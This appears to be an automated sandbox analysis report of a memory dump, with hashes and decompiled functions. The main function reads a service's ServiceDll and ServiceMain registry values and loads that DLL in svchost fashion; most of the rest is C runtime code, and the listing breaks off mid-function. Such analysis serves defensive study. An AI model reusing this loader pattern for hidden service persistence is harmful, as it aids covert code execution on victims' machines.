Source File: 00000000.00000002.352955029.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
Instruction ID: 4f2e87d07d1add9cca57db1f5c607419115beafd45785e256750c84b480a68ad
Opcode Fuzzy Hash: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
Instruction Fuzzy Hash: 29E01235764649DFCB54CBA8C981D15B3F8EB197B0B154294FC15C77A1E634EE00D690

Uniqueness

Uniqueness Score: -1.00%

Function 00A90A1C, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.352955029.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
Instruction ID: 64e869dcece64c1ce74e4e945a26d64f7b33acd1d515d713b056da5dd8d9b48f
Opcode Fuzzy Hash: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
Instruction Fuzzy Hash: D6E046363116508FCB209B1D8580D66F3E9EB883F0719886AE84AD3A12C230EC008690

Uniqueness

Uniqueness Score: -1.00%

Function 00A9099F, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.352955029.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40

Uniqueness

Uniqueness Score: -1.00%

Function 00D41160, Relevance: 79.0, APIs: 35, Strings: 10, Instructions: 225
memorystringregistryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00D41160(WCHAR* _a4, WCHAR** _a8) {
				void* _v8;
				void* _v12;
				long _v16;
				struct HINSTANCE__* _v20;
				void* _v24;
				signed int _v28;
				WCHAR* _v32;
				_Unknown_base(*)()* _v36;
				void* _v40;
				int _v44;
				long _v48;
				int _t82;
				int _t83;
				int _t85;
				int _t86;
				long _t125;
				void* _t134;

				_v12 = 0;
				_v8 = 0;
				_v40 = 0;
				_v32 = 0;
				_v24 = 0;
				_v20 = 0;
				_v36 = 0;
				_v48 = 0;
				_t82 = lstrlenW(L"System\\CurrentControlSet\\Services");
				_t83 = lstrlenW("\\");
				_t85 = lstrlenW(_a4);
				_t86 = lstrlenW("\\");
				_t11 = lstrlenW(L"Parameters") + 1; // 0x1
				_v28 = _t82 + _t83 + _t85 + _t86 + _t11;
				_v8 = HeapAlloc(GetProcessHeap(), 0, _v28 << 1);
				lstrcpyW(_v8, L"System\\CurrentControlSet\\Services");
				lstrcatW(_v8, "\\");
				lstrcatW(_v8, _a4);
				lstrcatW(_v8, "\\");
				lstrcatW(_v8, L"Parameters");
				 *((short*)(_v8 + _v28 * 2 - 2)) = 0;
				_v16 = RegOpenKeyExW(0x80000002, _v8, 0, 0x20019,  &_v12);
				if(_v16 == 0) {
					_v40 = E00D41000(_v12, L"ServiceDll");
					if(_v40 != 0) {
						_v32 = E00D410B0(_v40);
						if(_v32 != 0) {
							_v16 = RegQueryValueExA(_v12, "ServiceMain", 0, 0, 0,  &_v44);
							if(_v16 != 0) {
								L10:
								RegCloseKey(_v12);
								_v20 = LoadLibraryExW(_v32, 0, 8);
								if(_v20 != 0) {
									if(_v24 == 0) {
										_v36 = GetProcAddress(_v20, "ServiceMain");
									} else {
										_v36 = GetProcAddress(_v20, _v24);
									}
									if(_v36 != 0) {
										GetProcAddress(_v20, "SvchostPushServiceGlobals");
										 *_a8 = _a4;
										_a8[1] = _v36;
										_v48 = 1;
									} else {
										FreeLibrary(_v20);
									}
								} else {
									_t125 = GetLastError();
									0xd40000(_v32, _t125);
									0xd40000("failed to load library %s, err=%u\n", _t125);
								}
								goto L18;
							}
							_v28 = _v44 + 1;
							_v24 = HeapAlloc(GetProcessHeap(), 0, _v28);
							_v16 = RegQueryValueExA(_v12, "ServiceMain", 0, 0, _v24,  &_v44);
							if(_v16 == 0) {
								 *((char*)(_v24 + _v28 - 1)) = 0;
								goto L10;
							}
							RegCloseKey(_v12);
							goto L18;
						}
						RegCloseKey(_v12);
						goto L18;
					}
					RegCloseKey(_v12);
					goto L18;
				} else {
					_t134 = _v8;
					0xd40000(_t134, _v16);
					0xd40000("cannot open key %s, err=%d\n", _t134);
					L18:
					HeapFree(GetProcessHeap(), 0, _v8);
					HeapFree(GetProcessHeap(), 0, _v40);
					HeapFree(GetProcessHeap(), 0, _v32);
					HeapFree(GetProcessHeap(), 0, _v24);
					return _v48;
				}
			}

0x00d41167
0x00d4116e
0x00d41175
0x00d4117c
0x00d41183
0x00d4118a
0x00d41191
0x00d41198
0x00d411a4
0x00d411b1
0x00d411bd
0x00d411ca
0x00d411dd
0x00d411e1
0x00d411f9
0x00d41205
0x00d41214
0x00d41222
0x00d41231
0x00d41240
0x00d4124e
0x00d4126d
0x00d41274
0x00d412a1
0x00d412a8
0x00d412c2
0x00d412c9
0x00d412f3
0x00d412fa
0x00d41358
0x00d4135c
0x00d41370
0x00d41377
0x00d4139a
0x00d413be
0x00d4139c
0x00d413aa
0x00d413aa
0x00d413c5
0x00d413dc
0x00d413e8
0x00d413f0
0x00d413f3
0x00d413c7
0x00d413cb
0x00d413cb
0x00d41379
0x00d41379
0x00d41384
0x00d4138f
0x00d4138f
0x00000000
0x00d41377
0x00d41302
0x00d41318
0x00d41336
0x00d4133d
0x00d41354
0x00000000
0x00d41354
0x00d41343
0x00000000
0x00d41343
0x00d412cf
0x00000000
0x00d412cf
0x00d412ae
0x00000000
0x00d41276
0x00d4127a
0x00d4127e
0x00d41289
0x00d413fa
0x00d41407
0x00d4141a
0x00d4142d
0x00d41440
0x00d4144d
0x00d4144d

APIs

lstrlenW.KERNEL32(System\CurrentControlSet\Services), ref: 00D411A4
lstrlenW.KERNEL32(00D52048), ref: 00D411B1
lstrlenW.KERNEL32(00000000), ref: 00D411BD
lstrlenW.KERNEL32(00D5204C), ref: 00D411CA
lstrlenW.KERNEL32(Parameters), ref: 00D411D7
GetProcessHeap.KERNEL32(00000000,?), ref: 00D411EC
HeapAlloc.KERNEL32(00000000), ref: 00D411F3
lstrcpyW.KERNEL32 ref: 00D41205
lstrcatW.KERNEL32(00000000,00D52068), ref: 00D41214
lstrcatW.KERNEL32(00000000,00000000), ref: 00D41222
lstrcatW.KERNEL32(00000000,00D5206C), ref: 00D41231
lstrcatW.KERNEL32(00000000,Parameters), ref: 00D41240
RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00020019,00000000), ref: 00D41267
RegCloseKey.ADVAPI32(00000000), ref: 00D412AE
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D41400
HeapFree.KERNEL32(00000000), ref: 00D41407
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D41413
HeapFree.KERNEL32(00000000), ref: 00D4141A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D41426
HeapFree.KERNEL32(00000000), ref: 00D4142D
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D41439
HeapFree.KERNEL32(00000000), ref: 00D41440

Strings

SvchostPushServiceGlobals, xrefs: 00D413D3
System\CurrentControlSet\Services, xrefs: 00D4119F, 00D411FC
failed to load library %s, err=%u, xrefs: 00D4138A
Parameters, xrefs: 00D411D2
Parameters, xrefs: 00D41237
ServiceMain, xrefs: 00D413AF
ServiceMain, xrefs: 00D41327
cannot open key %s, err=%d, xrefs: 00D41284
ServiceDll, xrefs: 00D41293
ServiceMain, xrefs: 00D412E4

Memory Dump Source

Source File: 00000000.00000002.353025980.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.353021820.0000000000D40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.353036235.0000000000D4D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.353042879.0000000000D52000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.353052329.0000000000D55000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.353063498.0000000000D56000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Processlstrlen$Freelstrcat$AllocCloseOpenlstrcpy
String ID: Parameters$Parameters$ServiceDll$ServiceMain$ServiceMain$ServiceMain$SvchostPushServiceGlobals$System\CurrentControlSet\Services$cannot open key %s, err=%d$failed to load library %s, err=%u
API String ID: 922840199-2032176762
Opcode ID: e9add8140c4c896119fc8ac7dc579203bf7e47662001a98939ff0775f2ac85c2
Instruction ID: 38b6e7807da41b6333bd6ee437076b9255ebf91503498570edc979370ec4487c
Opcode Fuzzy Hash: e9add8140c4c896119fc8ac7dc579203bf7e47662001a98939ff0775f2ac85c2
Instruction Fuzzy Hash: A891C4B9A01208EFDB10DFE4D849BAEBBB9EF49701F108548FA05A7390C7759949CB74

Uniqueness

Uniqueness Score: -1.00%

Function 00D415A0, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 62
registryCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E00D415A0(intOrPtr _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t19;
				long _t22;

				_v16 = 0;
				_v12 = 0;
				_t19 = RegOpenKeyExW(0x80000002, L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Svchost", 0, 0x20019,  &_v16);
				_v8 = _t19;
				if(_v8 == 0) {
					_v12 = E00D41000(_v16, _a4);
					_t22 = RegCloseKey(_v16);
					if(_v12 != 0) {
						_v8 = E00D41450(_v12);
						if(_v8 == 0) {
							HeapFree(GetProcessHeap(), 0, _v12);
						}
						return _v8;
					}
					0xd40000(L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Svchost");
					0xd40000(_a4, _t22);
					0xd40000("cannot find registry value %s in %s\n", _t22);
					return 0;
				}
				0xd40000(L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Svchost", _v8);
				0xd40000("cannot open key %s, err=%d\n", _t19);
				return 0;
			}

0x00d415a6
0x00d415ad
0x00d415c9
0x00d415cf
0x00d415d6
0x00d41602
0x00d41609
0x00d41613
0x00d41641
0x00d41648
0x00d41657
0x00d41657
0x00000000
0x00d4165d
0x00d4161a
0x00d41624
0x00d4162f
0x00000000
0x00d41634
0x00d415e1
0x00d415ec
0x00000000

APIs

RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion\Svchost,00000000,00020019,00000000), ref: 00D415C9
RegCloseKey.ADVAPI32(00000000), ref: 00D41609

Strings

cannot open key %s, err=%d, xrefs: 00D415E7
cannot find registry value %s in %s, xrefs: 00D4162A
Software\Microsoft\Windows NT\CurrentVersion\Svchost, xrefs: 00D415BF, 00D415DC, 00D41615

Memory Dump Source

Source File: 00000000.00000002.353025980.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.353021820.0000000000D40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.353036235.0000000000D4D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.353042879.0000000000D52000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.353052329.0000000000D55000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.353063498.0000000000D56000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseOpen
String ID: Software\Microsoft\Windows NT\CurrentVersion\Svchost$cannot find registry value %s in %s$cannot open key %s, err=%d
API String ID: 47109696-3561747105
Opcode ID: c86c38140b9867951ece5865c4c35b9ba72fbf4769fb40581d56f7d3a95aa4a6
Instruction ID: 09de88dc6a4244947cbd94bff343256789271e9755d5ef05013623cafcdfc1f4
Opcode Fuzzy Hash: c86c38140b9867951ece5865c4c35b9ba72fbf4769fb40581d56f7d3a95aa4a6
Instruction Fuzzy Hash: A7112E78940308FFDB10EFE4DC4AFAEBB79EB45705F108154FA05A7280DA709A849B74

Uniqueness

Uniqueness Score: -1.00%

Function 00D42E3A, Relevance: 10.5, APIs: 7, Instructions: 45
threadCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00D42E3A(void* __ebx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t3;
				intOrPtr _t6;
				long _t14;
				long* _t27;

				E00D42FE9(_t3);
				if(E00D44289() != 0) {
					_t6 = E00D43D99(E00D42BCB);
					 *0xd521a8 = _t6;
					__eflags = _t6 - 0xffffffff;
					if(_t6 == 0xffffffff) {
						goto L1;
					} else {
						_t27 = E00D4430F(1, 0x3bc);
						__eflags = _t27;
						if(_t27 == 0) {
							L6:
							E00D42EB0();
							__eflags = 0;
							return 0;
						} else {
							__eflags = E00D43DF5( *0xd521a8, _t27);
							if(__eflags == 0) {
								goto L6;
							} else {
								_push(0);
								_push(_t27);
								E00D42D87(__ebx, __edi, _t27, __eflags);
								_t14 = GetCurrentThreadId();
								_t27[1] = _t27[1] | 0xffffffff;
								 *_t27 = _t14;
								__eflags = 1;
								return 1;
							}
						}
					}
				} else {
					L1:
					E00D42EB0();
					return 0;
				}
			}

0x00d42e3a
0x00d42e46
0x00d42e55
0x00d42e5a
0x00d42e60
0x00d42e63
0x00000000
0x00d42e65
0x00d42e72
0x00d42e76
0x00d42e78
0x00d42ea7
0x00d42ea7
0x00d42eac
0x00d42eaf
0x00d42e7a
0x00d42e88
0x00d42e8a
0x00000000
0x00d42e8c
0x00d42e8c
0x00d42e8e
0x00d42e8f
0x00d42e96
0x00d42e9c
0x00d42ea0
0x00d42ea4
0x00d42ea6
0x00d42ea6
0x00d42e8a
0x00d42e78
0x00d42e48
0x00d42e48
0x00d42e48
0x00d42e4f
0x00d42e4f

APIs

__init_pointers.LIBCMT ref: 00D42E3A

Part of subcall function 00D42FE9: RtlEncodePointer.NTDLL(00000000,?,00D42E3F,00D4290E,00D510E8,00000014), ref: 00D42FEC
Part of subcall function 00D42FE9: __initp_misc_winsig.LIBCMT ref: 00D43007
Part of subcall function 00D42FE9: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00D43E8D
Part of subcall function 00D42FE9: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00D43EA1
Part of subcall function 00D42FE9: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00D43EB4
Part of subcall function 00D42FE9: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00D43EC7
Part of subcall function 00D42FE9: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00D43EDA
Part of subcall function 00D42FE9: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00D43EED
Part of subcall function 00D42FE9: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00D43F00
Part of subcall function 00D42FE9: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00D43F13
Part of subcall function 00D42FE9: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00D43F26
Part of subcall function 00D42FE9: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00D43F39
Part of subcall function 00D42FE9: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00D43F4C
Part of subcall function 00D42FE9: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00D43F5F
Part of subcall function 00D42FE9: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00D43F72
Part of subcall function 00D42FE9: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00D43F85
Part of subcall function 00D42FE9: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00D43F98
Part of subcall function 00D42FE9: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00D43FAB

__mtinitlocks.LIBCMT ref: 00D42E3F
__mtterm.LIBCMT ref: 00D42E48

Part of subcall function 00D42EB0: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00D42E4D,00D4290E,00D510E8,00000014), ref: 00D441A3
Part of subcall function 00D42EB0: _free.LIBCMT ref: 00D441AA
Part of subcall function 00D42EB0: DeleteCriticalSection.KERNEL32(00D521F8,?,?,00D42E4D,00D4290E,00D510E8,00000014), ref: 00D441CC

__calloc_crt.LIBCMT ref: 00D42E6D
__initptd.LIBCMT ref: 00D42E8F
GetCurrentThreadId.KERNEL32 ref: 00D42E96

Memory Dump Source

Source File: 00000000.00000002.353025980.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.353021820.0000000000D40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.353036235.0000000000D4D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.353042879.0000000000D52000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.353052329.0000000000D55000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.353063498.0000000000D56000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 3567560977-0
Opcode ID: 4045ed5652d1f5a30b547b7f65f5adf57a7189993287b5e65878ccc6d868c83f
Instruction ID: 894cae1675d0cd4e1ecf55cac9b0cdcfbe1ee3096bdaa06480cac723fc4bc863
Opcode Fuzzy Hash: 4045ed5652d1f5a30b547b7f65f5adf57a7189993287b5e65878ccc6d868c83f
Instruction Fuzzy Hash: 56F090725097112FE325BB79BC0767F2A85CF01731F65066AF5A0D51D5EF20988285B4

Uniqueness

Uniqueness Score: -1.00%

Function 00D41000, Relevance: 9.1, APIs: 6, Instructions: 66
memoryregistryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00D41000(void* _a4, short* _a8) {
				void* _v8;
				long _v12;
				unsigned int _v16;
				int _v20;
				int _v24;

				_v12 = RegQueryValueExW(_a4, _a8, 0,  &_v24, 0,  &_v20);
				if(_v12 == 0) {
					_v16 = _v20 + 4;
					_v8 = HeapAlloc(GetProcessHeap(), 0, _v16);
					_v12 = RegQueryValueExW(_a4, _a8, 0,  &_v24, _v8,  &_v20);
					if(_v12 == 0) {
						 *((short*)(_v8 + (_v16 >> 1) * 2 - 2)) = 0;
						 *((short*)(_v8 + (_v16 >> 1) * 2 - 4)) = 0;
						return _v8;
					}
					HeapFree(GetProcessHeap(), 0, _v8);
					return 0;
				}
				return 0;
			}

0x00d41020
0x00d41027
0x00d41033
0x00d41049
0x00d41068
0x00d4106f
0x00d41092
0x00d410a1
0x00000000
0x00d410a6
0x00d4107e
0x00000000
0x00d41084
0x00000000

APIs

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00D4101A
GetProcessHeap.KERNEL32(00000000,?), ref: 00D4103C
HeapAlloc.KERNEL32(00000000), ref: 00D41043
RegQueryValueExW.ADVAPI32(00000000,?,00000000,?,?,?), ref: 00D41062
GetProcessHeap.KERNEL32(00000000,?), ref: 00D41077
HeapFree.KERNEL32(00000000), ref: 00D4107E

Memory Dump Source

Source File: 00000000.00000002.353025980.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.353021820.0000000000D40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.353036235.0000000000D4D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.353042879.0000000000D52000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.353052329.0000000000D55000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.353063498.0000000000D56000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$ProcessQueryValue$AllocFree
String ID:
API String ID: 1095795037-0
Opcode ID: c8001a33288ef9617a75a173795e8a71e22c66a0e42e4b04a62758f1acee13fd
Instruction ID: 6638eda8d13af947e17b48b7a53ccf90ee8ca4985cf6fa2f56770ef868e807a0
Opcode Fuzzy Hash: c8001a33288ef9617a75a173795e8a71e22c66a0e42e4b04a62758f1acee13fd
Instruction Fuzzy Hash: 7E21E879A00208FFDB04DFE8D949FAEB7B9EF48300F108559E606E7290D630AA45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00D42ECD, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E00D42ECD(void* __ecx, intOrPtr _a4) {
				struct HINSTANCE__* _v8;
				_Unknown_base(*)()* _t4;

				_t4 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t4, __ecx);
				if(_t4 != 0) {
					_t4 = GetProcAddress(_v8, "CorExitProcess");
					if(_t4 != 0) {
						return  *_t4(_a4);
					}
				}
				return _t4;
			}

0x00d42ed1
0x00d42edc
0x00d42ee4
0x00d42eee
0x00d42ef6
0x00000000
0x00d42efb
0x00d42ef6
0x00d42f00

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,00D42F0C,00000000,?,00D46394,000000FF,0000001E,00000000,00000000,00000000,?,00D4436D), ref: 00D42EDC
GetProcAddress.KERNEL32(?,CorExitProcess), ref: 00D42EEE

Strings

CorExitProcess, xrefs: 00D42EE6
mscoree.dll, xrefs: 00D42ED5

Memory Dump Source

Source File: 00000000.00000002.353025980.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.353021820.0000000000D40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.353036235.0000000000D4D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.353042879.0000000000D52000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.353052329.0000000000D55000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.353063498.0000000000D56000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 1646373207-1276376045
Opcode ID: 3093ceb4a4baef84ec2067131ac32cc2e42f111e413aa293fe28c308196dc507
Instruction ID: 53a4047287f7b833cf63f320a8d1106a45319b6b6c5fff3c22d98bece394534c
Opcode Fuzzy Hash: 3093ceb4a4baef84ec2067131ac32cc2e42f111e413aa293fe28c308196dc507
Instruction Fuzzy Hash: 42D0173134030DBBDB109FA1DC0AF6ABB6EAB01B41F044065F908E15A0DA62DA15A671

Uniqueness

Uniqueness Score: -1.00%

Function 00D4855A, Relevance: 6.1, APIs: 4, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00D4855A(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				int _v20;
				int _t35;
				int _t38;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E00D44760( &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E00D4849C( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t59 = 1;
							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							if(__eflags != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E00D45086(__eflags);
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							__eflags = _t50 -  *(_t59 + 0x74);
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(__eflags == 0) {
								goto L20;
							}
							L18:
							_t59 =  *(_t59 + 0x74);
							goto L21;
						}
						__eflags = _t50 -  *(_t59 + 0x74);
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}

0x00d48562
0x00d48567
0x00d48581
0x00000000
0x00d48581
0x00d48569
0x00d4856e
0x00000000
0x00000000
0x00d48573
0x00d48590
0x00d48595
0x00d48598
0x00d4859f
0x00d485be
0x00d485c5
0x00d485c7
0x00d4860b
0x00d4861a
0x00d48628
0x00d4862a
0x00d4863a
0x00d4863a
0x00d4863e
0x00d48640
0x00d48643
0x00d48643
0x00d48643
0x00d48643
0x00000000
0x00d48649
0x00d4862c
0x00d4862c
0x00d48631
0x00d48631
0x00d48634
0x00000000
0x00d48634
0x00d485c9
0x00d485cc
0x00d485d0
0x00d485f9
0x00d485f9
0x00d485fc
0x00d485fc
0x00000000
0x00000000
0x00d485fe
0x00d48602
0x00000000
0x00000000
0x00d48604
0x00d48604
0x00000000
0x00d48604
0x00d485d2
0x00d485d5
0x00000000
0x00000000
0x00d485d9
0x00d485ec
0x00d485f2
0x00d485f5
0x00d485f7
0x00000000
0x00000000
0x00000000
0x00d485f7
0x00d485a1
0x00d485a4
0x00d485a6
0x00d485ab
0x00d485ab
0x00d485b0
0x00000000
0x00d485b0
0x00d48575
0x00d4857a
0x00d4857e
0x00d4857e
0x00000000

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00D48590
__isleadbyte_l.LIBCMT ref: 00D485BE
MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,?,00000000), ref: 00D485EC
MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,?,00000000), ref: 00D48622

Memory Dump Source

Source File: 00000000.00000002.353025980.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.353021820.0000000000D40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.353036235.0000000000D4D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.353042879.0000000000D52000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.353052329.0000000000D55000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.353063498.0000000000D56000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: fce6dc6e0a607fb3aba82649f47f8dc5a7fa4a796d67793f91fcf182b07be449
Instruction ID: 0b4bb3b4d2ef0cf05f5433be5a8ee3d7bee89448bfff992f5eb4030bb30bcb43
Opcode Fuzzy Hash: fce6dc6e0a607fb3aba82649f47f8dc5a7fa4a796d67793f91fcf182b07be449
Instruction Fuzzy Hash: 66319031A00246AFDB219F75C844BAE7BA6FF41390F1A4569F854871A0EB30D890EBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00D463F9, Relevance: 6.1, APIs: 4, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00D463F9(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					__eflags = _t31;
					if(_t31 != 0) {
						_push(__ebx);
						while(1) {
							__eflags = _t31 - 0xffffffe0;
							if(_t31 > 0xffffffe0) {
								break;
							}
							__eflags = _t31;
							if(_t31 == 0) {
								_t31 = _t31 + 1;
								__eflags = _t31;
							}
							_t7 = HeapReAlloc( *0xd5329c, 0, _a4, _t31);
							_t20 = _t7;
							__eflags = _t20;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								__eflags =  *0xd540d0 - _t7;
								if(__eflags == 0) {
									_t9 = E00D45086(__eflags);
									 *_t9 = E00D45099(GetLastError());
									goto L17;
								} else {
									__eflags = E00D45380(_t7, _t31);
									if(__eflags == 0) {
										_t12 = E00D45086(__eflags);
										 *_t12 = E00D45099(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E00D45380(_t6, _t31);
						 *((intOrPtr*)(E00D45086(__eflags))) = 0xc;
						goto L12;
					} else {
						E00D442D7(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E00D46367(__ebx, __edx, __edi, _a8);
				}
			}

0x00d46400
0x00d4640e
0x00d46411
0x00d46413
0x00d46422
0x00d46455
0x00d46455
0x00d46458
0x00000000
0x00000000
0x00d46425
0x00d46427
0x00d46429
0x00d46429
0x00d46429
0x00d46436
0x00d4643c
0x00d4643e
0x00d46440
0x00d464a0
0x00d464a0
0x00d46442
0x00d46442
0x00d46448
0x00d4648a
0x00d4649e
0x00000000
0x00d4644a
0x00d46451
0x00d46453
0x00d46472
0x00d46486
0x00d4646c
0x00d4646c
0x00d4646c
0x00000000
